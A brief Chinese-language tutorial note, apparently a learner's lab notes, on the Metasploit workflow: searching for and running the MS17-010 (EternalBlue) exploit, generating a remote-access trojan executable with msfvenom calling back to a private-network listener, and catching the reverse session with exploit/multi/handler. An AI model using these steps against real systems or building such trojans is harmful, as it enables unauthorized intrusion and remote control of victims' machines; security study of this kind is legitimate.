步骤

  1. 使用metasploit攻击三步走

  2. 使用模块-选择参数-发起攻击

  3. 比如搜索漏洞search ms17-010搜索永恒之蓝漏洞

  4. use 模块名称

  5. 配置模块必选项 set

  6. 运行模块run

    image-20241102002826020

    image-20241102003009341

    image-20241102003136876

  7. 退出按exit

使用msfvenom生成远控木马

  1. msfvenom是用于生成远控木马的软件,在本地监听上线,msfvenom在shell里面使用不是msfconsole终端
  2. 指令格式如下:
  • lhost=192.168.190.129 lport=9999 -f exe -o demo.exe
  • -p表示payload 系统/架构/作用/方式 -f表示格式
  • -o表示输出文件

设置多模块攻击

  1. use exploit/multi/handler 使用这个模块
  2. set lhost 设置本地IP
  3. set lport 设置本地端口
  4. run 运行模块并,等待木马被执行
  5. 有会话连接就是中招了